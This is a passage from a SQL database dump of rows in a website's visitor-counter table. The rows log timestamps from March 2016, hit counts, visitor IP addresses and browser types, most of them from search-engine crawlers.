65.6','other'),(21320,1458047464,1,1,0,0,'51.255.65.14','other'),(21321,1458047725,1,1,0,0,'207.46.13.63','other'),(21322,1458047730,1,0,1,0,'68.180.230.35',''),(21323,1458047799,1,1,0,0,'94.179.102.6','firefox'),(21324,1458047828,1,1,0,0,'194.44.45.187','firefox'),(21325,1458047942,1,1,0,0,'207.46.13.192','other'),(21326,1458048452,1,0,1,0,'66.249.66.158',''),(21327,1458048643,1,1,0,0,'66.249.66.133','other'),(21328,1458048730,1,1,0,0,'8.29.198.26','other'),(21329,1458048903,1,1,0,0,'91.196.178.71','firefox'),(21330,1458049204,1,1,0,0,'178.93.210.73','chrome'),(21331,1458049249,2,2,0,0,'66.249.66.129','other'),(21332,1458049255,3,3,0,0,'66.249.66.162','other'),(21333,1458049430,1,1,0,0,'91.250.59.156','chrome'),(21334,1458049504,2,2,0,0,'66.249.66.166','other'),(21335,1458049771,6,6,0,0,'66.249.66.158','other'),(21336,1458050076,1,0,1,0,'68.180.230.35',''),(21337,1458050290,1,1,0,0,'85.115.62.180','other'),(21338,1458050460,1,1,0,0,'46.133.34.153','chrome'),(21339,1458050825,3,3,0,0,'66.249.66.158','other'),(21340,1458050865,1,1,0,0,'66.249.66.129','other'),(21341,1458051281,1,1,0,0,'91.196.178.71','firefox'),(21342,1458051428,1,1,0,0,'66.249.66.166','other'),(21343,1458051448,1,1,0,0,'66.249.66.162','other'),(21344,1458051473,1,1,0,0,'66.249.66.190','other'),(21345,1458051696,1,1,0,0,'82.207.91.234','firefox'),(21346,1458052036,2,0,2,0,'66.249.66.158',''),(21347,1458052139,1,1,0,0,'37.53.230.40','chrome'),(21348,1458052232,1,1,0,0,'91.196.178.71','firefox'),(21349,1458052287,1,1,0,0,'66.249.66.158','other'),(21350,1458052369,1,1,0,0,'91.196.178.167','chrome'),(21351,1458052389,3,3,0,0,'82.193.127.15','other'),(21352,1458052407,1,1,0,0,'66.249.93.86','chrome'),(21353,1458052567,1,1,0,0,'93.73.232.149','firefox'),(21354,1458053283,1,1,0,0,'91.196.177.44','chrome'),(21355,1458053419,3,0,3,0,'66.249.66.158',''),(21356,1458053670,2,0,2,0,'68.180.230.35',''),(21357,1458053712,1,0,1,0,'66.249.66.129',''),(21358,1458053738,2,0,2,0,'66.249.66.166',''),(21359,1458054012,1,1,0,0,'51.255.65.71','other'),(21360,1458054023,1,1,0,0,'82.207.4.13','chrome'),(21361,1458054387,1,1,0,0,'66.249.66.162','other'),(21362,1458054398,1,1,0,0,'217.69.133.84','other'),(21363,1458054710,1,1,0,0,'91.196.178.71','firefox'),(21364,1458054737,1,1,0,0,'40.77.167.51','other'),(21365,1458055108,1,0,1,0,'66.249.66.158',''),(21366,1458055135,1,1,0,0,'66.102.9.84','chrome'),(21367,1458055570,1,1,0,0,'109.251.158.139','chrome'),(21368,1458055982,1,0,1,0,'66.249.66.133',''),(21369,1458056371,1,1,0,0,'66.249.92.103','other');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (21370,1458056418,3,3,0,0,'66.249.66.158','other'),(21371,1458056727,1,1,0,0,'66.249.66.166','other'),(21372,1458056752,2,2,0,0,'66.249.66.162','other'),(21373,1458057311,1,1,0,0,'207.46.13.192','other'),(21374,1458057492,1,1,0,0,'180.76.15.33','other'),(21375,1458057531,2,2,0,0,'66.249.66.158','other'),(21376,1458057565,1,1,0,0,'180.76.15.157','other'),(21377,1458057899,1,1,0,0,'178.92.33.106','chrome'),(21378,1458058497,1,1,0,0,'164.132.161.39','other'),(21379,1458058912,1,0,1,0,'68.180.230.35',''),(21380,1458059117,1,1,0,0,'46.219.251.36','chrome'),(21381,1458059367,2,2,0,0,'66.249.78.144','other'),(21382,1458059478,1,1,0,0,'66.249.78.158','other'),(21383,1458059512,1,1,0,0,'91.124.182.203','firefox'),(21384,1458059735,1,1,0,0,'164.132.161.93','other'),(21385,1458059896,2,2,0,0,'66.249.78.151','other'),(21386,1458060058,1,1,0,0,'207.46.13.80','other'),(21387,1458060075,1,1,0,0,'91.196.178.165','firefox'),(21388,1458060174,4,0,4,0,'68.180.230.35',''),(21389,1458060333,1,1,0,0,'8.29.198.25','other'),(21390,1458060563,1,1,0,0,'66.249.66.166','other'),(21391,1458060568,1,1,0,0,'164.132.161.84','other'),(21392,1458060622,1,1,0,0,'51.255.65.51','other'),(21393,1458060870,2,2,0,0,'188.163.75.3','other'),(21394,1458061771,4,4,0,0,'82.193.127.15','other'),(21395,1458062235,1,1,0,0,'66.249.78.158','other'),(21396,1458062293,1,0,1,0,'66.249.66.133',''),(21397,1458062500,2,0,2,0,'66.249.78.144',''),(21398,1458062564,1,0,1,0,'66.249.78.151',''),(21399,1458063104,1,1,0,0,'164.132.161.60','other'),(21400,1458063314,1,1,0,0,'178.93.149.100','opera'),(21401,1458063771,1,1,0,0,'46.29.21.195','firefox'),(21402,1458063849,2,0,2,0,'66.249.78.158',''),(21403,1458064191,1,1,0,0,'178.92.8.29','chrome'),(21404,1458064348,4,0,4,0,'66.249.78.151',''),(21405,1458064527,2,2,0,0,'217.69.133.221','other'),(21406,1458064702,1,1,0,0,'193.194.127.217','firefox'),(21407,1458064791,1,0,1,0,'68.180.230.35',''),(21408,1458065237,2,1,1,0,'66.249.78.151',''),(21409,1458066064,1,1,0,0,'178.92.8.29','chrome'),(21410,1458066092,1,1,0,0,'37.55.226.220','chrome'),(21411,1458066148,1,1,0,0,'217.69.133.215','other'),(21412,1458066184,1,1,0,0,'66.249.78.151','other'),(21413,1458066603,1,1,0,0,'94.179.23.114','firefox'),(21414,1458067143,2,0,2,0,'68.180.230.35',''),(21415,1458067680,1,1,0,0,'66.249.92.95','other'),(21416,1458067872,1,1,0,0,'37.55.226.220','chrome'),(21417,1458067958,1,1,0,0,'91.196.178.99','chrome'),(21418,1458068143,2,2,0,0,'95.135.90.72','chrome'),(21419,1458068890,1,1,0,0,'91.196.178.71','chrome'),(21420,1458069330,1,0,1,0,'66.249.78.151',''),(21421,1458069342,1,1,0,0,'207.46.13.80','other'),(21422,1458069363,1,1,0,0,'78.111.186.173','chrome'),(21423,1458069611,1,0,1,0,'68.180.230.35',''),(21424,1458069812,1,0,1,0,'66.249.78.144',''),(21425,1458070378,1,0,1,0,'66.249.78.37',''),(21426,1458070640,1,0,1,0,'66.249.78.151',''),(21427,1458071009,1,0,1,0,'68.180.230.35',''),(21428,1458071227,1,1,0,0,'8.29.198.26','other'),(21429,1458071635,1,0,1,0,'66.249.66.166',''),(21430,1458071641,1,1,0,0,'91.124.182.203','firefox'),(21431,1458072122,1,1,0,0,'207.46.13.80','other'),(21432,1458072376,1,1,0,0,'51.255.65.48','other'),(21433,1458072493,1,1,0,0,'217.69.133.67','other'),(21434,1458072942,1,0,1,0,'66.249.78.158',''),(21435,1458072977,1,1,0,0,'82.193.127.15','other'),(21436,1458073108,1,0,1,0,'66.249.78.30',''),(21437,1458073137,7,7,0,0,'66.249.78.144','other'),(21438,1458073164,1,1,0,0,'37.55.226.220','chrome'),(21439,1458073191,3,3,0,0,'66.249.78.158','other'),(21440,1458073294,1,0,1,0,'66.249.78.151',''),(21441,1458073297,1,1,0,0,'66.249.78.30','other'),(21442,1458073457,1,1,0,0,'66.249.78.44','other'),(21443,1458073463,1,1,0,0,'157.55.39.185','other'),(21444,1458073479,1,1,0,0,'40.77.167.60','other'),(21445,1458073808,4,4,0,0,'80.91.162.99','other'),(21446,1458073923,1,0,1,0,'68.180.230.35',''),(21447,1458074413,1,1,0,0,'66.249.78.158','other'),(21448,1458074786,1,1,0,0,'66.249.78.144','other'),(21449,1458075240,1,1,0,0,'51.255.65.69','other'),(21450,1458075822,1,1,0,0,'141.8.132.79','other'),(21451,1458075825,1,1,0,0,'141.8.142.88','other'),(21452,1458075829,1,1,0,0,'141.8.142.10','other'),(21453,1458075832,1,1,0,0,'5.255.253.53','other'),(21454,1458075836,1,1,0,0,'141.8.142.41','other'),(21455,1458075840,1,1,0,0,'130.193.51.102','other'),(21456,1458075843,1,1,0,0,'141.8.132.2','other'),(21457,1458075847,1,1,0,0,'178.154.149.11','other'),(21458,1458075864,1,0,1,0,'68.180.230.35',''),(21459,1458075983,2,0,2,0,'66.249.78.144',''),(21460,1458076067,2,0,2,0,'66.249.78.151',''),(21461,1458076190,1,0,1,0,'66.249.66.162',''),(21462,1458076346,1,1,0,0,'180.76.15.15','other'),(21463,1458076390,48,48,0,0,'80.91.162.99','other'),(21464,1458076456,1,1,0,0,'217.69.133.85','other'),(21465,1458076463,1,1,0,0,'164.132.161.89','other'),(21466,1458077469,1,1,0,0,'217.69.133.217','other'),(21467,1458077663,1,1,0,0,'217.69.133.84','other'),(21468,1458078053,1,1,0,0,'66.249.78.158','other'),(21469,1458078530,1,1,0,0,'91.196.178.66','firefox'),(21470,1458078557,3,0,3,0,'66.249.78.144',''),(21471,1458078567,1,0,1,0,'66.249.78.151',''),(21472,1458078781,1,1,0,0,'66.249.92.99','other'),(21473,1458079218,1,1,0,0,'164.132.161.55','other'),(21474,1458079235,1,1,0,0,'141.8.132.76','other'),(21475,1458079238,1,1,0,0,'141.8.184.18','other'),(21476,1458079241,2,2,0,0,'5.255.253.53','other'),(21477,1458079365,2,2,0,0,'130.193.51.43','other'),(21478,1458079368,1,1,0,0,'130.193.51.102','other'),(21479,1458079507,1,1,0,0,'178.154.149.11','other'),(21480,1458079632,1,1,0,0,'141.8.184.11','other'),(21481,1458079638,2,2,0,0,'5.255.253.10','other'),(21482,1458079654,2,2,0,0,'5.255.253.100','other'),(21483,1458079658,3,3,0,0,'141.8.142.10','other'),(21484,1458079665,2,2,0,0,'5.255.253.55','other'),(21485,1458079679,1,1,0,0,'141.8.142.8','other'),(21486,1458079708,1,1,0,0,'141.8.184.22','other'),(21487,1458079746,1,1,0,0,'93.158.152.9','other'),(21488,1458079750,1,1,0,0,'130.193.51.45','other'),(21489,1458079753,1,1,0,0,'130.193.51.91','other'),(21490,1458079757,1,1,0,0,'130.193.51.81','other'),(21491,1458079816,2,0,2,0,'68.180.230.35',''),(21492,1458079848,1,1,0,0,'130.193.37.27','other'),(21493,1458080405,3,0,3,0,'66.249.78.144',''),(21494,1458080436,1,0,1,0,'66.249.78.37',''),(21495,1458080468,1,0,1,0,'66.249.66.158',''),(21496,1458080916,1,0,1,0,'66.249.66.162',''),(21497,1458081401,2,0,2,0,'66.249.78.151',''),(21498,1458081588,1,0,1,0,'66.249.78.144',''),(21499,1458081711,1,1,0,0,'51.255.65.41','other'),(21500,1458082113,1,1,0,0,'8.29.198.26','other'),(21501,1458082233,1,0,1,0,'66.249.78.37',''),(21502,1458082279,1,1,0,0,'207.46.13.63','other'),(21503,1458082419,1,0,1,0,'66.249.78.151',''),(21504,1458082436,1,1,0,0,'141.8.132.66','other'),(21505,1458082439,1,1,0,0,'178.154.189.12','other'),(21506,1458082443,2,2,0,0,'5.255.253.62','other'),(21507,1458082446,1,1,0,0,'141.8.142.41','other'),(21508,1458082450,1,1,0,0,'141.8.132.79','other'),(21509,1458082453,1,1,0,0,'141.8.132.2','other'),(21510,1458082457,1,1,0,0,'178.154.149.11','other'),(21511,1458082460,1,1,0,0,'93.158.152.65','other'),(21512,1458082467,1,1,0,0,'5.255.253.30','other'),(21513,1458082470,1,1,0,0,'130.193.37.21','other'),(21514,1458082774,1,0,1,0,'66.249.66.158',''),(21515,1458083169,1,1,0,0,'164.132.161.18','other'),(21516,1458083305,1,1,0,0,'89.38.150.47','firefox'),(21517,1458083721,1,1,0,0,'164.132.161.57','other'),(21518,1458083825,1,1,0,0,'66.249.66.162','other'),(21519,1458083849,2,2,0,0,'66.249.66.158','other'),(21520,1458083875,5,5,0,0,'66.249.78.144','other'),(21521,1458084328,1,0,1,0,'66.249.78.151',''),(21522,1458084352,1,0,1,0,'68.180.230.35',''),(21523,1458084439,1,1,0,0,'51.255.65.3','other'),(21524,1458084526,1,1,0,0,'130.193.37.21','other'),(21525,1458084529,1,1,0,0,'5.255.253.53','other'),(21526,1458084532,1,1,0,0,'130.193.50.22','other'),(21527,1458085049,1,1,0,0,'194.0.131.173','other'),(21528,1458085228,2,0,2,0,'66.249.78.144',''),(21529,1458085562,1,1,0,0,'66.249.78.151','other'),(21530,1458085963,1,1,0,0,'194.0.131.173','other'),(21531,1458085989,1,0,1,0,'66.249.78.44',''),(21532,1458086032,1,1,0,0,'51.255.65.29','other'),(21533,1458086745,1,1,0,0,'194.0.131.159','other'),(21534,1458086876,1,1,0,0,'194.0.131.173','other'),(21535,1458087042,1,1,0,0,'141.8.184.18','other'),(21536,1458087045,2,2,0,0,'93.158.152.9','other'),(21537,1458087048,1,1,0,0,'5.255.253.53','other'),(21538,1458087051,2,2,0,0,'141.8.183.14','other'),(21539,1458087054,1,1,0,0,'141.8.132.99','other'),(21540,1458087057,1,1,0,0,'130.193.37.21','other'),(21541,1458087064,1,1,0,0,'5.255.253.100','other'),(21542,1458087100,1,0,1,0,'66.249.78.144',''),(21543,1458087169,1,1,0,0,'194.0.131.176','other'),(21544,1458087258,1,1,0,0,'194.0.131.178','other'),(21545,1458087325,1,1,0,0,'51.255.65.74','other'),(21546,1458087396,2,0,2,0,'66.249.78.151',''),(21547,1458087775,1,0,1,0,'66.249.78.44',''),(21548,1458087779,1,1,0,0,'194.0.131.173','other'),(21549,1458087837,1,0,1,0,'66.249.78.158',''),(21550,1458087943,1,1,0,0,'66.249.78.158','other'),(21551,1458088051,1,1,0,0,'40.77.167.35','other'),(21552,1458088195,1,1,0,0,'164.132.161.41','other'),(21553,1458088615,1,0,1,0,'66.249.66.166',''),(21554,1458088720,1,1,0,0,'194.0.131.173','other'),(21555,1458088885,1,1,0,0,'194.0.131.178','other'),(21556,1458089440,1,1,0,0,'66.249.92.95','other'),(21557,1458089570,1,0,1,0,'66.249.78.151',''),(21558,1458089650,1,1,0,0,'194.0.131.173','other'),(21559,1458089985,1,0,1,0,'66.249.78.67',''),(21560,1458090263,1,1,0,0,'141.8.184.18','other'),(21561,1458090267,1,1,0,0,'141.8.132.99','other'),(21562,1458090270,1,1,0,0,'93.158.152.9','other'),(21563,1458090274,1,1,0,0,'178.154.149.11','other'),(21564,1458090278,1,1,0,0,'141.8.184.22','other'),(21565,1458090545,1,1,0,0,'194.0.131.187','other'),(21566,1458090580,1,1,0,0,'194.0.131.173','other'),(21567,1458090852,1,0,1,0,'68.180.230.35',''),(21568,1458090901,1,0,1,0,'66.249.66.166',''),(21569,1458091088,1,1,0,0,'194.0.131.181','other'),(21570,1458091943,2,0,2,0,'66.249.78.151',''),(21571,1458091986,1,1,0,0,'207.46.13.63','other'),(21572,1458092706,1,0,1,0,'68.180.230.35',''),(21573,1458092840,1,0,1,0,'66.249.66.158',''),(21574,1458092881,1,0,1,0,'66.249.78.158',''),(21575,1458092968,1,1,0,0,'51.255.65.27','other'),(21576,1458093013,1,1,0,0,'40.77.167.35','other'),(21577,1458093016,1,1,0,0,'8.29.198.25','other'),(21578,1458093318,1,0,1,0,'66.249.78.151',''),(21579,1458093489,1,1,0,0,'40.77.167.60','other'),(21580,1458094438,1,0,1,0,'68.180.230.35',''),(21581,1458094771,1,0,1,0,'66.249.78.151',''),(21582,1458094853,1,0,1,0,'66.249.78.144',''),(21583,1458095679,1,1,0,0,'40.77.167.35','other'),(21584,1458096011,1,1,0,0,'66.249.78.144','other'),(21585,1458096130,208,208,0,0,'82.193.127.15','other'),(21586,1458096370,1,1,0,0,'66.249.66.158','other'),(21587,1458096493,2,0,2,0,'66.249.78.151',''),(21588,1458096738,1,0,1,0,'68.180.230.35',''),(21589,1458097031,27,27,0,0,'82.193.127.15','other'),(21590,1458097646,1,0,1,0,'66.249.78.158',''),(21591,1458097681,1,1,0,0,'164.132.161.18','other'),(21592,1458097826,1,1,0,0,'141.8.184.11','other'),(21593,1458097830,1,1,0,0,'141.8.132.2','other'),(21594,1458097834,1,1,0,0,'130.193.51.102','other'),(21595,1458098684,1,0,1,0,'66.249.78.144',''),(21596,1458099142,1,0,1,0,'66.249.78.158',''),(21597,1458099301,1,1,0,0,'207.46.13.63','other'),(21598,1458099498,1,1,0,0,'217.69.133.219','other'),(21599,1458100032,2,0,2,0,'66.249.66.162',''),(21600,1458100079,1,0,1,0,'66.249.78.30',''),(21601,1458100293,2,2,0,0,'93.158.152.26','other'),(21602,1458100296,1,1,0,0,'141.8.142.88','other'),(21603,1458100571,1,1,0,0,'66.249.92.99','other'),(21604,1458100684,1,1,0,0,'51.255.65.82','other'),(21605,1458101593,1,0,1,0,'66.249.78.151',''),(21606,1458101742,1,1,0,0,'66.249.78.144','other'),(21607,1458101849,1,1,0,0,'164.132.161.91','other'),(21608,1458102001,1,0,1,0,'66.249.78.158',''),(21609,1458102030,1,1,0,0,'66.249.78.151','other'),(21610,1458102246,1,1,0,0,'164.132.161.95','other'),(21611,1458102263,1,1,0,0,'164.132.161.68','other'),(21612,1458102421,1,1,0,0,'164.132.161.46','other'),(21613,1458102716,1,0,1,0,'68.180.230.170',''),(21614,1458102902,1,1,0,0,'51.255.65.17','other'),(21615,1458103085,1,1,0,0,'180.76.15.155','other'),(21616,1458103105,1,1,0,0,'164.132.161.55','other'),(21617,1458103213,1,0,1,0,'66.249.78.158',''),(21618,1458103382,1,1,0,0,'66.249.66.158','other'),(21619,1458103389,1,1,0,0,'217.69.133.85','other'),(21620,1458103765,1,1,0,0,'217.69.133.221','other'),(21621,1458103853,1,1,0,0,'8.29.198.26','other'),(21622,1458103884,1,1,0,0,'66.249.78.151','other'),(21623,1458104630,1,0,1,0,'66.249.66.166',''),(21624,1458104681,5,5,0,0,'5.255.253.53','other'),(21625,1458104691,1,1,0,0,'141.8.142.10','other'),(21626,1458104695,6,6,0,0,'178.154.149.11','other'),(21627,1458104715,2,2,0,0,'141.8.184.18','other'),(21628,1458104723,1,1,0,0,'93.158.152.9','other'),(21629,1458104727,2,2,0,0,'141.8.183.14','other'),(21630,1458104771,1,1,0,0,'164.132.161.80','other'),(21631,1458104831,1,1,0,0,'62.210.215.100','chrome'),(21632,1458105113,1,1,0,0,'66.249.78.151','other'),(21633,1458105170,1,0,1,0,'66.249.66.162',''),(21634,1458105433,1,0,1,0,'66.249.78.30',''),(21635,1458105439,1,0,1,0,'66.249.66.129',''),(21636,1458105863,1,1,0,0,'164.132.161.15','other'),(21637,1458105891,1,1,0,0,'66.249.78.37','other'),(21638,1458107010,1,0,1,0,'68.180.230.170',''),(21639,1458107484,3,3,0,0,'141.8.183.14','other'),(21640,1458107488,2,2,0,0,'130.193.51.45','other'),(21641,1458107492,3,3,0,0,'5.255.253.53','other'),(21642,1458107496,4,4,0,0,'141.8.184.18','other'),(21643,1458107505,2,2,0,0,'141.8.132.99','other'),(21644,1458107508,2,2,0,0,'93.158.152.9','other'),(21645,1458107521,1,1,0,0,'5.255.253.100','other'),(21646,1458107529,1,1,0,0,'178.154.149.11','other'),(21647,1458107672,1,1,0,0,'40.77.167.35','other'),(21648,1458107712,1,0,1,0,'66.249.78.158',''),(21649,1458107723,1,0,1,0,'66.249.78.144',''),(21650,1458107932,1,1,0,0,'91.196.178.136','firefox'),(21651,1458108029,1,1,0,0,'217.73.209.137','firefox'),(21652,1458108361,1,1,0,0,'207.46.13.63','other'),(21653,1458108439,1,1,0,0,'66.249.78.151','other'),(21654,1458109393,2,2,0,0,'66.249.78.158','other'),(21655,1458109581,1,1,0,0,'157.55.39.191','other'),(21656,1458109802,3,1,2,0,'66.249.78.151',''),(21657,1458110302,2,2,0,0,'66.249.78.158','other'),(21658,1458110484,2,0,2,0,'68.180.230.170',''),(21659,1458110726,1,1,0,0,'78.25.26.201','chrome'),(21660,1458111200,1,1,0,0,'66.249.92.103','other'),(21661,1458111223,1,0,1,0,'66.249.78.151',''),(21662,1458111473,1,0,1,0,'66.249.78.158',''),(21663,1458111487,1,0,1,0,'66.249.66.158',''),(21664,1458112165,2,2,0,0,'66.249.78.158','other'),(21665,1458112811,7,7,0,0,'141.8.184.18','other'),(21666,1458112822,3,3,0,0,'178.154.149.11','other'),(21667,1458113074,1,1,0,0,'66.249.66.162','other'),(21668,1458113149,2,0,2,0,'68.180.230.170',''),(21669,1458113301,1,1,0,0,'66.249.78.158','other'),(21670,1458113511,1,1,0,0,'193.34.172.243','chrome'),(21671,1458113739,1,1,0,0,'78.111.185.91','firefox'),(21672,1458114083,1,0,1,0,'66.249.66.166',''),(21673,1458114119,1,1,0,0,'66.249.78.144','other'),(21674,1458114240,1,0,1,0,'68.180.230.170',''),(21675,1458114247,3,0,3,0,'66.249.78.151',''),(21676,1458114562,1,1,0,0,'40.77.167.60','other'),(21677,1458114605,1,1,0,0,'91.196.178.70','chrome'),(21678,1458114831,1,1,0,0,'8.29.198.25','other'),(21679,1458115011,1,0,1,0,'66.249.78.158',''),(21680,1458115032,1,1,0,0,'89.38.150.47','firefox'),(21681,1458115307,1,0,1,0,'66.249.78.151',''),(21682,1458115450,3,3,0,0,'141.8.184.18','other'),(21683,1458115457,3,3,0,0,'141.8.183.14','other'),(21684,1458115460,1,1,0,0,'93.158.152.9','other'),(21685,1458115474,1,1,0,0,'5.255.253.53','other'),(21686,1458115714,3,1,2,0,'66.249.78.151',''),(21687,1458115874,1,0,1,0,'66.249.78.144',''),(21688,1458115975,1,1,0,0,'194.44.130.194','chrome'),(21689,1458116026,1,0,1,0,'66.249.78.37',''),(21690,1458116071,2,1,1,0,'66.249.78.144',''),(21691,1458116703,2,0,2,0,'68.180.230.170',''),(21692,1458116715,1,1,0,0,'91.196.178.69','chrome'),(21693,1458116800,2,0,2,0,'66.249.78.30',''),(21694,1458117099,1,0,1,0,'66.249.78.144',''),(21695,1458117286,1,1,0,0,'178.154.149.11','other'),(21696,1458117323,2,0,2,0,'66.249.78.151',''),(21697,1458117331,1,1,0,0,'180.76.15.5','other'),(21698,1458117346,1,1,0,0,'40.77.167.35','other'),(21699,1458117385,1,1,0,0,'141.8.184.22','other'),(21700,1458117444,1,1,0,0,'46.201.240.112','firefox'),(21701,1458117470,1,1,0,0,'66.249.78.151','other'),(21702,1458117515,2,1,1,0,'66.249.78.144',''),(21703,1458118171,5,5,0,0,'5.255.253.100','other'),(21704,1458118177,5,5,0,0,'130.193.51.43','other'),(21705,1458118180,5,5,0,0,'141.8.183.14','other'),(21706,1458118183,4,4,0,0,'130.193.37.21','other'),(21707,1458118202,1,1,0,0,'141.8.132.99','other'),(21708,1458118210,5,5,0,0,'93.158.152.26','other'),(21709,1458118216,3,3,0,0,'5.255.253.53','other'),(21710,1458118222,1,1,0,0,'93.158.152.9','other'),(21711,1458118228,2,2,0,0,'5.255.253.10','other'),(21712,1458118253,1,1,0,0,'178.154.149.11','other'),(21713,1458118278,1,1,0,0,'130.193.51.45','other'),(21714,1458118285,1,1,0,0,'141.8.184.18','other'),(21715,1458118289,1,1,0,0,'141.8.184.11','other'),(21716,1458118367,3,0,3,0,'68.180.230.170',''),(21717,1458118838,1,0,1,0,'66.249.78.44',''),(21718,1458118845,4,0,4,0,'66.249.78.158',''),(21719,1458119075,1,0,1,0,'66.249.66.162',''),(21720,1458119431,1,1,0,0,'78.111.190.13','chrome'),(21721,1458119441,1,1,0,0,'91.196.178.129','chrome'),(21722,1458119491,1,0,1,0,'66.249.78.151',''),(21723,1458119651,1,1,0,0,'182.118.21.210','msie'),(21724,1458120005,1,0,1,0,'68.180.230.170',''),(21725,1458120057,1,0,1,0,'66.249.78.30',''),(21726,1458120092,1,1,0,0,'207.46.13.63','other'),(21727,1458120222,1,1,0,0,'66.249.78.158','other'),(21728,1458120253,1,1,0,0,'91.196.178.169','chrome'),(21729,1458120577,4,0,4,0,'66.249.78.151',''),(21730,1458120656,1,0,1,0,'66.249.78.44',''),(21731,1458120703,1,0,1,0,'66.249.78.37',''),(21732,1458120808,2,2,0,0,'37.54.23.183','chrome'),(21733,1458120953,1,0,1,0,'66.249.66.190',''),(21734,1458121401,1,0,1,0,'66.249.78.158',''),(21735,1458121462,1,1,0,0,'51.255.65.40','other'),(21736,1458121501,1,1,0,0,'217.69.133.219','other'),(21737,1458122140,1,1,0,0,'66.249.92.103','other'),(21738,1458122161,1,1,0,0,'217.69.133.218','other'),(21739,1458122227,1,1,0,0,'51.255.65.50','other'),(21740,1458122252,1,1,0,0,'66.249.78.151','other'),(21741,1458122434,1,0,1,0,'66.249.78.158',''),(21742,1458122748,1,1,0,0,'91.196.178.37','firefox'),(21743,1458122766,1,0,1,0,'68.180.230.170',''),(21744,1458122866,1,1,0,0,'164.132.161.24','other'),(21745,1458123410,1,1,0,0,'62.210.215.100','chrome'),(21746,1458123427,1,1,0,0,'164.132.161.95','other'),(21747,1458123787,3,3,0,0,'178.154.149.11','other'),(21748,1458123790,3,3,0,0,'141.8.183.14','other'),(21749,1458123794,1,1,0,0,'93.158.152.9','other'),(21750,1458123796,4,0,4,0,'68.180.230.170',''),(21751,1458124016,2,2,0,0,'141.8.184.18','other'),(21752,1458124048,1,0,1,0,'66.249.78.44',''),(21753,1458124135,1,0,1,0,'66.249.78.151',''),(21754,1458124284,1,1,0,0,'91.196.176.13','chrome'),(21755,1458124361,1,1,0,0,'91.196.178.39','chrome'),(21756,1458124522,1,1,0,0,'37.54.63.166','chrome'),(21757,1458124602,1,0,1,0,'66.249.78.144',''),(21758,1458124658,1,1,0,0,'217.69.133.221','other'),(21759,1458124825,1,1,0,0,'180.76.15.29','other'),(21760,1458125029,1,1,0,0,'40.77.167.35','other'),(21761,1458125181,1,1,0,0,'66.249.78.30','other'),(21762,1458125208,1,1,0,0,'91.196.178.70','firefox'),(21763,1458125225,2,2,0,0,'66.249.78.151','other'),(21764,1458125294,1,1,0,0,'66.102.9.94','chrome'),(21765,1458125325,3,0,3,0,'68.180.230.170',''),(21766,1458125395,1,1,0,0,'157.55.39.191','other'),(21767,1458125465,2,0,2,0,'66.249.78.158',''),(21768,1458125636,1,1,0,0,'91.196.178.134','chrome'),(21769,1458125668,1,1,0,0,'8.29.198.26','other'),(21770,1458125723,1,1,0,0,'164.132.161.67','other'),(21771,1458126054,1,0,1,0,'66.249.78.144',''),(21772,1458126122,1,1,0,0,'37.54.63.166','chrome'),(21773,1458126190,2,0,2,0,'66.249.66.158',''),(21774,1458126384,2,2,0,0,'51.255.65.67','other'),(21775,1458126826,3,2,1,0,'66.249.78.144',''),(21776,1458126860,1,1,0,0,'178.93.150.114','chrome'),(21777,1458127435,1,0,1,0,'66.249.78.44',''),(21778,1458127517,1,0,1,0,'66.249.78.151',''),(21779,1458127659,1,0,1,0,'66.249.78.37',''),(21780,1458128464,4,4,0,0,'5.9.85.4','other'),(21781,1458128569,2,0,2,0,'66.249.66.158',''),(21782,1458128650,1,0,1,0,'66.249.66.162',''),(21783,1458128851,1,1,0,0,'51.255.65.95','other'),(21784,1458128978,1,1,0,0,'164.132.161.19','other'),(21785,1458129003,2,2,0,0,'40.77.167.35','other'),(21786,1458129049,2,0,2,0,'66.249.66.166',''),(21787,1458129233,2,0,2,0,'68.180.230.170',''),(21788,1458129293,1,0,1,0,'66.249.66.129',''),(21789,1458129576,2,0,2,0,'66.249.66.162',''),(21790,1458129729,1,1,0,0,'194.54.160.10','chrome'),(21791,1458129795,3,3,0,0,'178.154.149.11','other'),(21792,1458129806,2,0,2,0,'66.249.66.158',''),(21793,1458129956,1,1,0,0,'92.113.191.176','chrome'),(21794,1458130177,1,1,0,0,'52.24.179.58','chrome'),(21795,1458131190,3,0,3,0,'66.249.66.166',''),(21796,1458131399,1,1,0,0,'217.69.133.219','other'),(21797,1458131456,1,1,0,0,'217.69.133.221','other'),(21798,1458131714,1,1,0,0,'217.69.133.67','other'),(21799,1458132008,1,1,0,0,'91.196.178.67','firefox'),(21800,1458132025,1,1,0,0,'193.24.221.34','chrome'),(21801,1458132099,3,3,0,0,'82.193.127.15','other'),(21802,1458132379,1,1,0,0,'141.8.183.14','other'),(21803,1458132382,2,2,0,0,'178.154.149.11','other'),(21804,1458132386,1,1,0,0,'93.158.152.9','other'),(21805,1458132389,1,1,0,0,'141.8.184.18','other'),(21806,1458132396,1,1,0,0,'141.8.184.11','other'),(21807,1458132399,1,1,0,0,'130.193.50.22','other'),(21808,1458132402,1,1,0,0,'130.193.51.50','other'),(21809,1458132405,1,1,0,0,'141.8.142.55','other'),(21810,1458132409,1,1,0,0,'141.8.132.66','other'),(21811,1458132444,1,1,0,0,'95.213.6.8','other'),(21812,1458132445,1,1,0,0,'217.69.136.31','chrome'),(21813,1458132645,1,1,0,0,'87.206.26.193','chrome'),(21814,1458132937,1,0,1,0,'66.249.66.162',''),(21815,1458133242,1,1,0,0,'66.249.92.103','other'),(21816,1458133623,1,1,0,0,'91.196.178.71','chrome'),(21817,1458133967,1,1,0,0,'193.194.125.4','opera'),(21818,1458134069,1,1,0,0,'180.76.15.17','other'),(21819,1458134182,1,1,0,0,'213.108.45.36','chrome'),(21820,1458134421,1,1,0,0,'91.250.41.130','firefox'),(21821,1458134460,1,1,0,0,'91.196.178.71','firefox'),(21822,1458134510,1,1,0,0,'95.132.126.176','chrome'),(21823,1458134604,1,0,1,0,'66.249.66.162',''),(21824,1458134777,3,1,2,0,'66.249.66.162',''),(21825,1458134975,52,52,0,0,'5.9.62.130','other'),(21826,1458134994,1,0,1,0,'66.249.66.158',''),(21827,1458135025,2,0,2,0,'66.249.66.166',''),(21828,1458135114,1,1,0,0,'91.196.178.70','firefox'),(21829,1458135157,1,0,1,0,'66.249.66.190',''),(21830,1458135393,1,1,0,0,'91.196.178.69','chrome'),(21831,1458135587,1,0,1,0,'66.249.66.133',''),(21832,1458135887,1,1,0,0,'94.179.23.227','chrome'),(21833,1458135934,1,0,1,0,'66.249.66.158',''),(21834,1458135937,1,1,0,0,'194.54.160.10','chrome'),(21835,1458135976,1,0,1,0,'68